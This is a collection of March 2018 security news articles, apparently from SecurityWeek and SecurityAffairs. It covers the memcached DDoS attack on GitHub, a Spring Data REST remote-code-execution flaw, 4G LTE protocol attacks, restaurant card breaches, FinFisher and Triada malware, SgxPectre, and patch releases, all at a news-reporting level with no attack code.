Several major restaurant chains disclosed payment card breaches last year, including Arby’s, Chipotle, Sonic Drive-In, and Shoney’s. Amazon's Whole Foods Market also informed customers that taprooms and full table-service restaurants at nearly 100 locations were hit by a breach.


Largest Ever 1.3Tbps DDoS Attack Includes Embedded Ransom Demands
5.3.2018 securityweek
Attack

[UPDATED - New record set at 1.7Tbs] On Tuesday, February 27, three major DDoS mitigation service providers (Akamai, Cloudflare and Arbor) warned that they had seen spikes in a relatively rare form of reflection/amplification DDoS attack via Memcached servers. Each service provider warned that this type of reflection attack had the potential to deliver far larger attacks.

One day later, Wednesday, February 28, GitHub was hit by the largest DDoS attack that had ever disclosed -- more than twice the size of the Mirai attack of 2016, peaking at 1.3Tbps. And still the potential, in the short term at least, is for even larger attacks.

Amplification attacks are generated when a server can be 'tricked' into sending a larger response than the initial query. Reflection occurs when the requesting IP is spoofed. The result is that multiple servers can be tricked into sending large responses to a single target IP, rapidly overwhelming it with the volume sent.

Memcached servers are particularly vulnerable to such a use whenever they are left accessible from the public internet. In theory, this should never -- or at least very rarely -- happen; in practice there are various estimates of between 50,000 and more than 100,000 vulnerable servers. Because the service was designed for use internally within data centers, it has no inbuilt security and can be easily compromised by attackers.

The purpose of Memcached servers is to cache frequently used data to improve internal access speeds. Its default service is via UDP. Because it can be easily compromised, the data it caches can be configured by the attackers. The result is that small requests to the server can result in very large replies from the cache. Researchers suggest, in theory, the reply could be up to 51,000 times the size of the request. This is the amplification side of the attack -- the ability to amplify a 203-byte request into a 100-megabyte response.

If the requests include a spoofed IP address, the reply can be sent to a different target IP address. This is the redirection side of the attack. If successive requests are made to multiple compromised Memcached servers all delivered to a single target IP, the result is an amplification/redirection DDoS attack such as that delivered against GitHub on 28 February.

This attack was described by GitHub Engineering on Thursday. "The attack originated from over a thousand different autonomous systems (ASNs) across tens of thousands of unique endpoints." It started at 17.21 UTC when GitHub's network monitoring detected an anomaly in the ratio of ingress to egress traffic. Within 5 minutes GitHub decided to call on Akamai's DDoS mitigation service.

"At 17:26 UTC the command was initiated via our ChatOps tooling to withdraw BGP announcements over transit providers and announce AS36459 exclusively over our links to Akamai." Akamai took over mitigation, and by 17:30, GitHub had recovered. Akamai's own statistics show that the attack peaked at 1.35 Tbps before tailing off; and was followed by a smaller, yet still very large, attack of around 400 Gbps just after 18:00 UTC.

Akamai's own brief report on the incident comments, "Many other organizations have experienced similar reflection attacks since Monday, and we predict many more, potentially larger attacks in the near future. Akamai has seen a marked increase in scanning for open memcached servers since the initial disclosure."

Small DDoS attacks are often delivered as an extortion 'warning', with a demand for payment to prevent a larger attack. Cybereason has noticed that this process was reversed in the GitHub attack -- the attack itself contained the extortion demand: "the same memcached servers used in the largest DDoS attack to date are including a ransom note in the payload that they're serving," it reported on Friday.

The extortion note, which occurs in a line of Python code delivered by the compromised Memcached servers, demands payment of 50 XMR (the symbol for the Monero cryptocurrency). This would have been approximately $15,000.

"It is a pretty clever trick to embed the ransom demand inside the DOS payload," Nick Bilogorskiy, cybersecurity strategist at Juniper Networks, told SecurityWeek. "It is also fitting with the times that attackers are asking for Monero rather than Bitcoin because Monero disguises the origin, destination and amount of each transaction, making it more suitable for ransoms."

There is no way of knowing whether any of the recent Memcached DDoS victims have paid a Monero ransom.

Memcached attacks are not entirely new, but have been relatively rare before the last ten days. The DDosMon from Qihoo 360 monitors amplification attack vectors and its figures show generally less than 100 attacks per day since at least November 2017. On 24 February this spiked to more than 400 attacks, followed by an increase to more than 700 in the following days.

It is thought that until recently Memcached attacks were deployed manually by skilled attackers, but that the attack techniques have now been weaponized and made available to all skill-levels via so-called booter/stresser botnets. This is what makes it likely that there will be more and potentially larger Memcached attacks in the future.

But it's not all doom and gloom. The number of vulnerable servers is already decreasing as operators begin to secure their Memcached servers.

"Overall memcached is expected to top the DDoS charts for a relatively short period of time," Ashley Stephenson, CEO, Corero Network Security, told SecurityWeek by email. "Ironically, as we have seen before, the more attackers who try to leverage this vector the weaker the resulting DDoS attacks as the total bandwidth of vulnerable servers is fixed and is shared across the victims. If a single attack could reach 200G, then with only 10 bad actors worldwide trying to use this vector at the same time they may only get 20G each. If there are hundreds of potential bad actors jumping on the memcached bandwagon, this once mighty resource could end up delivering just a trickle of an attack to each intended victim."

UPDATE - New record set at 1.7Tbps - As predicted, the Memcached DDoS methodology has already created a new world record. Netscout Arbor has today confirmed a 1.7Tbps DDoS attack against the customer of a U.S.-based service provider. This attack was recorded by Netscout Arbor’s ATLAS global traffic and threat data system, and is more than 2x the largest Netscout Arbor had previously seen. No further details are yet available.


Critical flaw in Pivotal’s Spring Data REST allows to hack any machine that runs an application built on its components
5.3.2018 securityaffairs
Vulnerebility

A critical flaw in Pivotal’s Spring Data REST allows remote attackers to execute arbitrary commands on any machine that runs an application built using its components.
Pivotal’s Spring Data REST project is affected by a critical vulnerability, tracked as CVE-2017-8046, that was discovered by security researchers at Semmle/lgtm.

Pivotal’s Spring Framework a platform is widely used by development teams for building web applications.

Spring Data REST builds on top of Spring Data repositories, it allows to expose hypermedia-driven HTTP resources (collection, item, and association resources) representing your model) for aggregates contained in the model.

The components included in the Spring Data REST are used by developers to build Java applications that offer RESTful APIs to underlying Spring Data repositories.

The vulnerability is similar to the weaknesses found in Apache Struts that resulted in the Equifax data breach.

“Security researchers at lgtm.com have discovered a critical remote code execution vulnerability that affects various projects in Pivotal Spring, the world’s most popular framework for building web applications.” reads the security advisory published by Semmle/lgtm. “The vulnerability allows attackers to execute arbitrary commands on any machine that runs an application built using Spring Data REST.”

Pivotal's Spring Data REST

This flaw ties the way Spring’s own expression language (SpEL) is used in the Data REST component. The lack of validation of the user input allows the attacker to execute arbitrary commands on any machine that runs an application built using Spring Data REST.

“Virtually every modern web application will contain components that communicate through REST interfaces, ranging from online travel booking systems, mobile applications and internet banking services,” continues the advisory.

Pivotal issued a security patch for a vulnerability it refers to as DATAREST-1127 as part of its Spring Boot 2.0 update.

“Malicious PATCH requests submitted to spring-data-rest servers can use specially crafted JSON data to run arbitrary Java code.” reads the security advisory published by Pivotal.

Researchers from lgtm.com have worked closely with Pivotal to solve the issue and publicly disclose the issue, the intent was to give Spring Data REST users sufficient time to update their apps.

The experts urge to apply the fix because it allows remote attackers to execute arbitrary commands on any machine that runs an application built using Spring Data REST.

The exploitation of the flaw in RESTful APIs could allow hackers to easily gain control over production servers and access sensitive information.

“This vulnerability in Spring Data REST is unfortunately very easy to exploit. As it is common for RESTful APIs to be publicly accessible, it potentially allows bad actors to easily gain control over production servers and obtain sensitive user data.” explained Man Yue Mo, lgtm.com security researcher at Semmle who discovered the issue.

The affected Spring products and components are:

Spring Data REST components, versions prior to 2.5.12, 2.6.7, 3.0RC3
(Maven artifacts: spring-data-rest-core, spring-data-rest-webmvc, spring-data-rest-distribution, spring-data-rest-hal-browser)
Spring Boot, versions prior to 2.0.0M4
(when using the included Spring Data REST component: spring-boot-starter-data-rest)
Spring Data, versions prior to Kay-RC3
Hurry up, upgrade to the latest versions the aabove components.


New attacks on 4G LTE networks can allow to spy on users and spoof emergency alerts
5.3.2018 securityaffairs Mobil 
Attack

A group of researchers discovered a number of weaknesses in the 4G LTE networks that could be exploited by attackers to eavesdrop on phone calls and text messages, knock devices offline, track location, and spoof emergency alerts.
A group of researchers from Purdue and the University of Iowa have discovered a number of vulnerabilities affecting the 4G LTE networks that could be exploited by attackers to eavesdrop on phone calls and text messages, knock devices offline, track location, and spoof emergency alerts.

The experts detailed ten different attacks in a research paper, the experts leverage weaknesses in three critical protocol operations of the cellular network, such as securely attaching a device to 4G LTE networks and maintaining a connection to receive calls and messages.

“In this paper, we investigate the security and privacy of the three critical procedures of the 4G LTE protocol (i.e., attach, detach, and paging), and in the process, uncover potential design flaws of the protocol and unsafe practices employed by the stakeholders.” reads the paper published by the experts.”For exposing vulnerabilities, we propose a model based testing approach LTEInspector which lazily combines a symbolic model checker and a cryptographic protocol verifier in the symbolic attacker model.”

The researchers devised a testing framework dubbed LTEInspector that they used to detect vulnerabilities in LTE radios and networks.

The group tested eight of the ten attacks using SIM cards from four large US carriers.

The researchers demonstrated how to conduct authentication relay attacks that allow them to bypass the network authentication and masquerade as a victim’s device.

An attacker can access 4G LTE networks and impersonate the victim.

” Using LTEInspector, we have uncovered 10 new attacks along with 9 prior attacks, categorized into three abstract classes (i.e., security, user privacy, and disruption of service), in the three procedures of 4G LTE.” continues the paper.
“Notable among our findings is the authentication relay attack that enables an adversary to spoof the location of a legitimate user to the core network without possessing appropriate credentials. To ensure that the exposed attacks pose real threats and are indeed realizable in practice, we have validated 8 of the 10 new attacks and their accompanying adversarial assumptions through experimentation in a real testbed”

4G LTE networks

The researchers highlighted the dangers related to the exploitation of the flaws, an attacker can spoof the location of the victim device, which could lead to interference in criminal investigations by planting false location information, which could allow crooks to create fake evidence.

The weaknesses could be exploited by threat actors to cause the chaos by injecting warning messages, emergency notices, and Amber alerts in the 4G LTE networks.

One of the scenarios tested by the researchers, a major US carrier never used encryption for control plane messages allowing an attacker to exploit the issues to eavesdrop the SMS and other sensitive data. The good news is that the US carrier has promptly addressed the flaw and deployed a fix.

The scary aspect of this research is that a cheap equipment (common software-defined radio devices) and open source 4G LTE protocol software could be bought by anyone to carry out the attacks.

Anyone can build the equipment to power the attacks for as little as $1,300 to $3,900.

The researchers announced that they plan to release the proof-of-concept code once the vulnerabilities will be fixed.


Applebee restaurants suffered payment card breach
5.3.2018 securityaffairs
Virus

RMH Franchise Holdings revealed on Friday afternoon that PoS systems at the Applebee ’s restaurants were infected with a PoS malware.
Another week another data breach, RMH Franchise Holdings revealed last week that PoS systems at the Applebee’s restaurants were infected with malware.

The PoS malware was used to collect names, payment card numbers, expiration dates, and card verification codes.

On Friday afternoon, RMH Franchise Holdings published a link to the data breach notice on its website.

“RMH Franchise Holdings (“RMH”) recently learned about a data incident affecting certain payment cards used at RMH-owned Applebee’s restaurants that we operate as a franchisee.” states the notice of the data breach.

“We are providing this notice to our guests as a precaution to inform them of the incident and to call their attention to some steps they can take to help protect themselves. RMH operates its point-of-sale systems isolated from the broader Applebee’s network, and this notice applies only to RMH-owned Applebee’s restaurants.”

The security breach was discovered on February 13, the RMH promptly started an investigation with the help of and law enforcement.

The infection lasted between December 6, 2017, and January 2, 2018, is some cases the malware was present on the PoS systems of restaurants since November 23 or December 5, 2017.

Almost any restaurant operated by RMH was impacted, the incident affects more than 160 restaurants in Alabama, Arizona, Florida, Illinois, Indiana, Kansas, Kentucky, Missouri, Mississippi, Nebraska, Ohio, Pennsylvania, Texas, and Wyoming.

Applebees restaurants

The security breach does not affect online payments systems, clients using self-pay tabletop devices were not affected too.

RMH clarified that its payment systems are not affected by the incident because they are isolated from the payment network used Applebee.

“After discovering the incident on February 13, 2018, RMH promptly took steps to ensure that it had been contained. In addition to engaging third-party cyber security experts to assist with our investigation, RMH also notified law enforcement about the incident and will continue to cooperate in their investigation.”RMH added.

“Moving forward, RMH is continuing to closely monitor its systems and review its security measures to help prevent something like this from happening again.”


Windows Defender ATP Detects Spyware Used by Law Enforcement: Microsoft
5.3.2018 securityweek
Virus

Microsoft Dissects FinFisher’s Complex Infection Process

Windows Defender Advanced Threat Protection (Windows Defender ATP) is capable of detecting behavior associated with the sophisticated FinFisher spyware, Microsoft says, after performing an in-depth analysis of the malware’s infection process.

FinFisher is a lawful interception solution built by Germany-based FinFisher GmbH, which sells it exclusively to governments. Also referred to as FinSpy, the malware has been around for over half a decade and has been associated with various surveillance campaigns.

In September last year, after the malware was observed exploiting a .NET Framework zero-day (CVE-2017-8759) for infection, ESET warned that Internet service providers (ISPs) might be involved in FinFisher’s distribution process.

According to Microsoft, FinFisher is complex enough to require “special methods to crack it” but, despite its sophistication, the malware cannot go unnoticed by its security tools. These include Office 365 Advanced Threat Protection (Office 365 ATP) and Windows Defender ATP, which is set to arrive on Windows 7 and Windows 8.1 devices this summer.

Packed with various detection, evasion and anti-analysis capabilities, including junk instructions and “spaghetti code,” multi-layered virtual machine detection, and several anti-debug and defensive measures, FinFisher wasn’t easy to tear apart and analyze, Microsoft says.

Through the addition of continuous code jumps (spaghetti code), FinFisher’s authors ensured that the program flow is difficult to read and can confuse disassembly programs. While reversing plugins that may help in such situations exist, none was found to work with this malware, and Microsoft had to come up with their own.

The first thing the company discovered was an array of opcode instructions that a custom virtual machine program can interpret. 32 different routines were discovered, each implementing a different opcode and functionality that the malware program may execute.

Not only does the use of virtualized instruction blocks ensure that analysis using regular tools is not possible, but anti-debug and anti-analysis tricks in the virtualized code attempt to evade dynamic analysis tools as well.

“Each virtual instruction is stored in a special data structure that contains all the information needed to be properly read and executed by the VM. […] The VM handler is completely able to generate different code blocks and deal with relocated code due to address space layout randomization (ASLR). It is also able to move code execution into different locations if needed,” the software giant explains.

The first stage of FinFisher is a loader meant to detect sandbox environments. If it passes the initial set of checks, the loader reads four imported libraries from disk (ntdll.dll, kernel32.dll, advapi32.dll, and version.dll) and remaps them in memory, rendering debuggers and software breakpoints useless.

Next, the malware performs additional anti-sandbox checks, likely in an attempt to avoid specific sandbox or security products, and also checks for virtualized environments (VMWare or Hyper-V) and if it is running under a debugger.

Only if all these checks are passed, the loader moves to the next step, which represents a second multi-platform virtual machine.

“The 32-bit stage 2 malware uses a customized loading mechanism (i.e., the PE file has a scrambled IAT and relocation table) and exports only one function. For the 64-bit stage 2 malware, the code execution is transferred from the loader using a well-known technique called Heaven’s Gate,” Microsoft explains.

The 64-bit stage 2 implements another loader and virtual machine, featuring an architecture similar to those in the previous stage, but using slightly different opcodes (which Microsoft lists on their site). The virtual machine extracts and decrypts the stage 3 malware. After decryption, the payload is remapped and executed in memory.

Stage 3, which represents the installation and persistence stage of the malware, is the setup program for FinFisher and no longer employs a VM or obfuscation. The code can install the malware in a UAC-enforced environment with limited privileges, or with full-administrative privileges enabled. However, no privilege escalation code was found in the malware.

During this installation step, stage 4, stage 5, and stage 6 payloads, along with additional files, are potentially dropped under a folder located in C:\ProgramData or in the user application data folder. Stage 4 is a loader for UAC bypass or installation with admin rights, stage 5 is a payload injected into explorer.exe or winlogon.exe, while stage 6 is the main malware executable.

The stage 5 malware only provides one more layer of obfuscation for the final payload (through the VM) and sets up a special Structured Exception Hander routine to ensure stealthy operations. After checking the environment once again, it proceeds to extract and execute the final payload into the injected process (it uses RunDll to implement the spyware).


SgxPectre attack allows to reveal the content of the SGX enclave
5.3.2018 securotyaffairs
Attack

A group of researchers from the Ohio State University has discovered a new variation of the Spectre attack named SgxPectre that allows to reveal the content of the SGX enclave.
A group of researchers from the Ohio State University has discovered a new variation of the Spectre attack named SgxPectre.

Intel Software Guard eXtensions (SGX) is a technology for application developers that allows protecting select code and data from disclosure or modification. The Intel SGX allows application code executing within an Intel SGX enclave, which are protected areas of execution in memory.

We have a long debated both Spectre and Meltdown vulnerabilities in Intel processors and the way to exploit them.

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

The Meltdown exploits the speculative execution to breach the isolation between user applications and the operating system, in this way any application can access all system memory.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

While the exploitation of Meltdown or Spectre doesn’t allow attackers to extract data from SGX enclaves, the SgxPectre attack exploits the bugs in Intel CPU to reveal the content of the SGX enclave.

“SGXPECTRE Attacks that exploit the recently disclosed CPU bugs to subvert the confidentiality of SGX enclaves. Particularly, we show that when branch prediction of the enclave code can be influenced by programs outside the enclave, the control flow of the enclave program can be temporarily altered to execute instructions that lead to observable cache-state changes.” reads the paper published by the researchers.

“An adversary observing such changes can learn secrets inside the enclave memory or its internal registers, thus completely defeating the confidentiality guarantee offered by SGX.”

According to the experts, almost any enclave program could be vulnerable to the SGXPECTRE attack.

SgxPectre Intel SGX enclave

The attack SgxPectre leverages on specific code patterns in software libraries that allow developers to add SGX support to their application. Desired code patterns are available in most SGX runtimes, including Intel SGX SDK, Rust-SGX, and Graphene-SGX.

Basically, the SgxPectre is a cache side-channel attack against enclave programs.

The researchers explained that their attack is based on the observation of the repetitive code execution patterns that the software development kits introduce in SGX enclaves and the associated variation in the cache size.

“In particular, because vulnerable code patterns exist in most SGX runtime libraries (e.g., Intel SGX SDK, Rust-SGX, Graphene-SGX) and are difficult to be eliminated, the adversary could perform SGXPECTRE Attacks against any enclave programs.” continues the paper.

“We demonstrate end-to-end attacks to show that the adversary could learn the content of the enclave memory, as well as its register values in such attacks”

Intel plans to address SgxPectre with a security update for the Intel SGX SDK that will be released on March 16.

Developers will need to update their application by using the new SDK version.

The experts released a video PoC of the attack while the PoC code was published on GitHub.


GCHQ fears energy smart meters could expose millions of Bretons to hack
4.3.2018 securityaffairs BigBrothers

In the United Kingdom, new smart energy meters that are set to be installed in 27 million homes were found vulnerable by GCHQ.
Unsecured IoT devices are a privileged target of hackers and unfortunately, smart energy meters belong to this category.

In the UK, new smart energy meters that are set to be installed in 27 million homes were found vulnerable by GCHQ.

According to the intelligence agency the vulnerabilities could be exploited by hackers to compromise the IoT devices posing a serious risk to the users.

In 2017, some energy providers in the UK, including British Gas, E.on, Npower, Scottish Power and EDF, started testing SMETS 2 smart energy meters, the successor of SMETS 1 meters.

The new model smart energy meters addressed several issues that affected the 8 million of SMETS 1 meters

SMETS 2 smart energy meters solved various problems that both consumers and energy firms faced with first-generation SMETS 1 meters. Unlike the older SMETS 1 meters, the UK, SMETS 2 could be used by energy suppliers to remotely receive meter readings electronically.


The SMETS 2 smart energy meters were also designed to interoperate with different suppliers, consumers can change the energy provider without needing to change the meters.

According to a post published by the Telegraph, the GCHQ has raised concerns over the security of the smart energy meters. Attackers hack them to steal personal details and defraud consumers by tampering with their bills.

“Cyber security experts say that making the meters universal will make them more attractive to hackers because the potential returns are so much greater if they can hack every meter using the same software.” states The Telegraph.

“The cyber criminals are able to artificially inflate meter readings, making bills higher.

They then try to intercept payments, and if they simply skim off the difference between the real reading and the false reading, energy companies will think the bill has been paid normally.”

The intelligence agency also warned attackers could use the devices as a “Trojan horse” to enter in the customers’ networks.

The UK Government also fears that nation-state actors could exploit the flaws in the energy smart meters to create a power surge that would damage the National Grid.

Security experts also warn of BlueBorne attacks that potentially expose smart meters to hack by leveraging Bluetooth connections.

Robert Cheesewright, of Smart Energy GB, the Government-funded agency promoting the smart meter roll-out, tried to downplay the risks explaining that no financial data is directly managed by the devices, but evidently, its explanation doesn’t consider different attack scenarios.

“Smart meters are one of the safest and most secure pieces of technology in your home.” said Robert Cheesewright.

“Only energy data is stored on a meter and this is encrypted. Your name, address, bank account or other financial details are not stored on the meter.”

Risks associated with vulnerable smart meters were already analyzed in the past, in 2014 the security researchers, Javier Vazquez Vidal and Alberto Garcia Illera discovered that millions of Network-connected electricity meters in Spain were are susceptible to cyberattack due to lack of proper security controls.


Bitcoin-linked heist: thieves stolen 600 powerful computers in Iceland
4.3.2018 securityaffairs Cryptocurrency

Thieves steal 600 powerful computers in a huge heist in Iceland with the intent to use them for mining Bitcoin.
Cyber criminal organization continue to show a great interest in cryptocurrencies, the number of crimes against cryptocurrency industry is on the rise.

News of the day is that crooks have stolen 600 powerful computers from data centers in Iceland to use in Bitcoin mining. At the time, the computers, that are worth almost $2 million, have not yet been found.

“Some 600 computers used to “mine” bitcoin and other virtual currencies have been stolen from data centers in Iceland in what police say is the biggest series of thefts ever in the North Atlantic island nation.” reads the post published by The Associated Press.

The thieves have stolen 600 graphics cards, 100 processors, 100 power supplies, 100 motherboards and 100 sets of computer memory to use in the proficuous activity.

The Icelandic media dubbed the crime the “Big Bitcoin Heist,” the authorities have arrested 11 people, including a security guard.

A judge at the Reykjanes District Court on Friday ordered two people to remain in custody.

“This is a grand theft on a scale unseen before,” Police Commissioner Olafur Helgi Kjartansson said. “Everything points to this being a highly organized crime.”


The thefts occurred between late December and early January, the members of the gang were identified thank the surveillance cameras used by the server company Advania.

Advania suffered two of the four thefts, the company had been offering its customers access to bitcoin-mining rigs, for this reason, crooks targeted the firm.

The police are searching any evidence to track the thieves, authorities are also tracking energy consumption across Iceland in case they turn on their computers. A spike in the energy consumption could reveal their location if the thieves don’t take measure to avoid being tracked.

“Police tracking the stolen computers are monitoring electric consumption across the country in hopes the thieves will show their hand, according to an industry source who spoke on condition of anonymity because he is not allowed to speak to the media.” concluded the Associated Press.

“Unusually high energy usage might reveal the whereabouts of the illegal bitcoin mine.”

Iceland is a good place where find cheap, renewable energy for crypto mining activities.


Over 40 models of low-cost Android devices shipped with Triada banking Trojan
4.3.2018 securityaffairs Android

Security researchers at Dr.Web have discovered over 40 models of low-cost Android smartphones are shipped with the dreaded Android Triada banking malware.
Security researchers at Antivirus firm Dr.Web have discovered that 42 models of low-cost Android smartphones are shipped with the Android.Triada.231 banking malware.

“In the middle of 2017, Doctor Web analysts discovered a new Trojan Android.Triada.231 in the firmware of some cheap models of Android devices. Since this detection, the list of infected devices has been constantly increasing.” reads the blog post published by Dr-Web. “At the moment, the list contains over 40 models. Doctor Web specialists have monitored the Trojan’s activity and now we can publish the results of this investigation.”

The Triada Trojan was spotted for the first time in 2016 by researchers at Kaspersky Lab that considered it the most advanced mobile threat seen to the date of the discovery.

Triada was designed with the specific intent to implement financial frauds, typically hijacking the financial SMS transactions. The most interesting characteristic of the Triada Trojan apart is its modular architecture, which gives it theoretically a wide range of abilities.

The Triada Trojan makes use of the Zygote parent process to implement its code in the context of all software on the device, this means that the threat is able to run in each application.
The only way to remove the threat is to wipe the smartphone and reinstall the OS.

Researchers at Dr.Web discovered the Triada Trojan pre-installed on newly shipped devices several minor brands, including Advan, Cherry Mobile, Doogee, and Leagoo.

This isn’t the first time the company discovered a pre-installed malware on Android device, back in in July 2017 Dr..Web researchers discovered the many smartphone models were shipped with the dreaded Triada trojan such as Leagoo M5 Plus, Leagoo M8, Nomu S10, and Nomu S20.

Triada Trojan Android pre-installed malware

The researchers at Dr.Web who investigated the issue discovered that a software developer from Shanghai was responsible for the infection.

“For example, it was detected on the Leagoo M9 smartphone that was announced in December 2017. Additionally, our analysts’ research showed that the Trojan’s penetration into firmware happened at request of the Leagoo partner, the software developer from Shanghai.” continues the blog post.

“This company provided Leagoo with one of its applications to be included into an image of the mobile operating system, as well as with an instruction to add third-party code into the system libraries before their compilation. Unfortunately, this controversial request did not evoke any suspicions from the manufacturer. Ultimately, Android.Triada.231 got to the smartphones without any obstacles.”

The infected app found on the device was developed by a Chinese firm, the experts highlighted that the code was signed with the same certificate that was observed in 2016 infections.

“The analysis of this application showed it is signed with the same certificate as Android.MulDrop.924. Doctor Web previously wrote about this Trojan in 2016. We can presume the developer that requested adding the additional program into the mobile operating system image can be connected expressly or implicitly with the distribution of Android.Triada.231.” continues Dr.Web.

At the moment, the experts confirmed to have detected the Android.Triada.231 in the firmware of the following Android device models:

Leagoo M5
Leagoo M5 Plus
Leagoo M5 Edge
Leagoo M8
Leagoo M8 Pro
Leagoo Z5C
Leagoo T1 Plus
Leagoo Z3C
Leagoo Z1C
Leagoo M9
ARK Benefit M8
Zopo Speed 7 Plus
UHANS A101
Doogee X5 Max
Doogee X5 Max Pro
Doogee Shoot 1
Doogee Shoot 2
Tecno W2
Homtom HT16
Umi London
Kiano Elegance 5.1
iLife Fivo Lite
Mito A39
Vertex Impress InTouch 4G
Vertex Impress Genius
myPhone Hammer Energy
Advan S5E NXT
Advan S4Z
Advan i5E
STF AERIAL PLUS
STF JOY PRO
Tesla SP6.2
Cubot Rainbow
EXTREME 7
Haier T51
Cherry Mobile Flare S5
Cherry Mobile Flare J2S
Cherry Mobile Flare P1
NOA H6
Pelitt T1 PLUS
Prestigio Grace M5 LTE
BQ 5510

Unfortunately, the number of infected smartphones models could be much bigger.


Github hit by the biggest-ever DDoS attack that peaked 1.35 Tbs
4.3.2018 securityaffairs
Attack

On February 28, 2018, the popular GitHub’s code hosting website was hit by the largest-ever distributed denial of service (DDoS) attack that peaked at 1.35 Tbps
On February 28, 2018, the popular GitHub’s code hosting website was hit by the largest-ever distributed denial of service (DDoS) attack.

The DDoS attack peaked at record 1.35 Tbps by abusing the memcached protocol to power a so-called memcached DDoS attacks.

Memcached is a free and open source, high-performance, distributed memory caching system designed to speed up dynamic web applications by alleviating database load.

Clients communicate with memcached servers via TCP or UDP on port 11211.

Researchers from Cloudflare, Arbor Networks and security firm Qihoo 360 discovered that recently attackers are abusing the memcached for DDoS amplification attacks.

Chinese experts warned about abuses of memcached DDoS attacks in November.

The abuse of memcached servers in DDoS Attacks is quite simple, the attacker sends a request to the targeted server on port 11211 spoofing the IP address of the victim. In a memcached DDoS attack, the request sent to the server is composed of a few bytes, while the response can be tens of thousands of times bigger, resulting in an amplification attack.

Experts at Cloudflare dubbed this type of attack Memcrashed, according to the researcher the amplification technique could allow attackers to obtain an amplification factor of 51,200.

memcached DDoS attack

The Github website is protected by the anti-DDoS service provided by the firm Akamai that confirmed the impressive magnitude of the attack that hit its client.

“At 17:28 GMT, February 28th, Akamai experienced a 1.3 Tbps DDoS attack against one of our customers, a software development company, driven by memcached reflection. This attack was the largest attack seen to date by Akamai, more than twice the size of the September, 2016 attacks that announced the Mirai botnet and possibly the largest DDoS attack publicly disclosed.” reads the analysis published by Akamai.

“Because of memcached reflection capabilities, it is highly likely that this record attack will not be the biggest for long.”

Github largest DDoS memcached server

According to GitHub, the attack was widespread, it originated from over a thousand different autonomous systems (ASNs) across tens of thousands of unique endpoints.

“On Wednesday, February 28, 2018 GitHub.com was unavailable from 17:21 to 17:26 UTC and intermittently unavailable from 17:26 to 17:30 UTC due to a distributed denial-of-service (DDoS) attack.” states an advisory post published by GitHub.

“Between 17:21 and 17:30 UTC on February 28th we identified and mitigated a significant volumetric DDoS attack.

The attack originated from over a thousand different autonomous systems (ASNs) across tens of thousands of unique endpoints. It was an amplification attack using the memcached-based approach described above that peaked at 1.35Tbps via 126.9 million packets per second.”

Github routed the traffic to Akamai service to mitigate the ongoing DDoS attack.

“Given the increase in inbound transit bandwidth to over 100Gbps in one of our facilities, the decision was made to move traffic to Akamai, who could help provide additional edge network capacity. At 17:26 UTC the command was initiated via our ChatOps tooling to withdraw BGP announcements over transit providers and announce AS36459 exclusively over our links to Akamai.” continues Github.

“Routes reconverged in the next few minutes and access control lists mitigated the attack at their border. Monitoring of transit bandwidth levels and load balancer response codes indicated a full recovery at 17:30 UTC. At 17:34 UTC routes to internet exchanges were withdrawn as a follow-up to shift an additional 40Gbps away from our edge.”

GitHub confirmed that the first portion of the attack peaked at 1.35Tbps, while a second part peaked 400Gbps after 18:00 UTC.

Github largest DDoS pasted image 2

Github said it plans to expand its edge network and mitigate new attack vectors.

Researchers believe that threat actors in the wild will abuse misconfigured Memcached servers in future attacks, unfortunately, many of them are still exposed on the Internet.

Cloudflare recommends disabling UDP support unless it’s needed and isolating memcached servers from the Internet. Internet service providers have to fix vulnerable protocols and prevent IP spoofing.

“Internet Service Providers – In order to defeat such attacks in future, we need to fix vulnerable protocols and also IP spoofing. As long as IP spoofing is permissible on the internet, we’ll be in trouble.” concluded Cloudflare.

“Developers – Please please please: Stop using UDP. If you must, please don’t enable it by default. If you do not know what an amplification attack is I hereby forbid you from ever typing
SOCK_DGRAM
into your editor.”


Microsoft released Windows Updates that include Intel’s Spectre microcode patches
4.3.2018 securityaffairs
Vulnerebility

Microsoft announced this week the release of the microcode updates to address the Spectre vulnerability.
Last week Intel released microcode to address the CVE-2017-5715Spectre vulnerability for many of its chips, let’s this time the security updates will not cause further problems.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Problems such as frequent reboots were related to the fix for the CVE-2017-5715 Spectre flaw (Spectre Variant 2) and affected almost any platform, including systems running on Broadwell Haswell CPUs, as well as Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

Microsoft is going to deliver microcode updates for Windows 10 version 1709 (Fall Creators Update) or Windows Server version 1709 (Server Core) running on devices with 6th Generation Intel Core (Skylake) processors.

“This update is a standalone update available through the Microsoft Update Catalog and targeted for Windows 10 version 1709 (Fall Creators Update) & Windows Server version 1709 (Server Core).” read the advisory published by Microsoft. “This update also includes Intel microcode updates that were already released for these Operating Systems at the time of Release To Manufacturing (RTM). We will offer additional microcode updates from Intel thru this KB Article for these Operating Systems as they become available to Microsoft.”

Microsoft confirmed that almost any Window devices now have compatible security products installed and all problems with patches have been fixed.

“We have also been working closely with our anti-virus (AV) partners on compatibility with Windows updates, resulting in the vast majority of Windows devices now having compatible AV software installed.” wrote John Cable, Director of Program Management, Windows Servicing and Delivery

“We will continue to require that an AV compatibility check is made before delivering the latest Windows security updates via Windows Update until we have a sufficient level of AV software compatibility.”


A flaw in HP Remote Management hardware Integrated Lights-Out 3 leaves expose servers to DoS
4.3.2018 securityaffairs
Vulnerebility

Hewlett Packard Enterprise issued a security patch to address a vulnerability (CVE-2017-8987) in HP remote management hardware Integrated Lights-Out 3.
Hewlett Packard Enterprise has issued a security patch to address a vulnerability (CVE-2017-8987) in its remote management hardware Integrated Lights-Out 3 that equip the family of HP ProLiant servers.

The Hewlett-Packard iLO is composed of a physical card with a separate network connection that is used for the remote management of the device.

HP Remote Management

The vulnerability could be exploited by a remote attacker to power a denial of service attack that could cause severe problems to datacenters under some conditions.

The vulnerability in the HP remote management hardware Integrated Lights-Out 3 was discovered by the researchers at Rapid7 researchers in September, the issue is rated “high severity” and it has received a CVSS base score of 8.6.

